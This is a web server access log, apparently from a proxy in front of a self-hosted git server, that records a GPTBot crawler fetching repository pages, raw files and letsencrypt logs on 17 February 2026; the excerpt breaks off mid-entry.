git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 135168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10636] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" -[17/Feb/2026:13:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10669] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" -[17/Feb/2026:13:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" [Client 74.7.227.38] [Length 9884] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" -[17/Feb/2026:13:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" [Client 74.7.227.38] [Length 28702] [Gzip 12.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" -[17/Feb/2026:13:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" [Client 74.7.227.38] [Length 16066] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" -[17/Feb/2026:13:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" [Client 74.7.227.38] [Length 11109] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f" -[17/Feb/2026:13:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" -[17/Feb/2026:13:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" -[17/Feb/2026:13:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 626459] [Gzip 15.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main" -[17/Feb/2026:13:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176802] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" -[17/Feb/2026:13:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" [Client 74.7.227.38] [Length 21776] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" -[17/Feb/2026:13:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static" -[17/Feb/2026:13:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static" -[17/Feb/2026:13:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2fapp.js" [Client 74.7.227.38] [Length 34501] [Gzip 8.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" -[17/Feb/2026:13:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html?display=rendered" [Client 74.7.227.38] [Length 14774] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" -[17/Feb/2026:13:38:28 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/$%7BgetInvestingUrl(symbol)%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" -[17/Feb/2026:13:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" [Client 74.7.227.38] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" -[17/Feb/2026:13:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx" [Client 74.7.227.38] [Length 10138] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx" -[17/Feb/2026:13:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" [Client 74.7.227.38] [Length 9900] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" -[17/Feb/2026:13:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" [Client 74.7.227.38] [Length 10161] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" -[17/Feb/2026:13:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659895] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" -[17/Feb/2026:13:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" [Client 74.7.227.38] [Length 9840] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" -[17/Feb/2026:13:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10194] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" -[17/Feb/2026:13:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" -[17/Feb/2026:13:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" -[17/Feb/2026:13:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10898] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject" -[17/Feb/2026:13:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10897] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject" -[17/Feb/2026:13:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10898] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" -[17/Feb/2026:13:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 35822] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:13:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" [Client 74.7.227.38] [Length 11079] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" -[17/Feb/2026:13:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.gitignore" [Client 74.7.227.38] [Length 23904] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" -[17/Feb/2026:13:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 33616] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:13:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 33429] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:13:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 31283] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:13:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" -[17/Feb/2026:13:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 10955] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:13:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main" -[17/Feb/2026:13:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main" -[17/Feb/2026:13:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main" -[17/Feb/2026:13:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 9948] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:13:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" [Client 74.7.227.38] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" -[17/Feb/2026:13:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" [Client 74.7.227.38] [Length 9873] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" -[17/Feb/2026:13:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" [Client 74.7.227.38] [Length 10129] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" -[17/Feb/2026:13:38:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 9939] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:13:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 9941] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:13:38:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 9947] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:13:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:13:38:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 9941] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:13:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 39264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:13:38:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 42638] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:13:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38745] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:13:38:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 23714] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:13:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 36011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 